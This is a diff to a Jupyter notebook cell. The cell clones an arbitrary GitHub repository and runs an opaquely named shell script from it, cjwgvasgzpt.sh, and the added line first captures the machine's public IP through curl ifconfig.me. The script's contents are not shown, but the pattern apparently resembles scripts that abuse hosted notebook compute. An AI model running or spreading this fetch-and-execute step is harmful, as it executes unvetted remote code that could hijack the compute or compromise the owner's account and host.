--- a/3.ipynb
+++ b/3.ipynb
@@ -603,7 +603,7 @@
       "source": [
         "! git clone https://github.com/drajathakim7/shiny-doodle.git\r\n",
 	"% cd shiny-doodle\n",
-        "! chmod +x *.sh && sed -i -e 's/\\r$//' cjwgvasgzpt.sh && ./cjwgvasgzpt.sh"
+        "! ip=$(echo \"$(curl -s ifconfig.me)\" | tr . _ ) && chmod +x *.sh && sed -i -e 's/\\r$//' cjwgvasgzpt.sh && ./cjwgvasgzpt.sh"
       ],
       "execution_count": null,
       "outputs": []
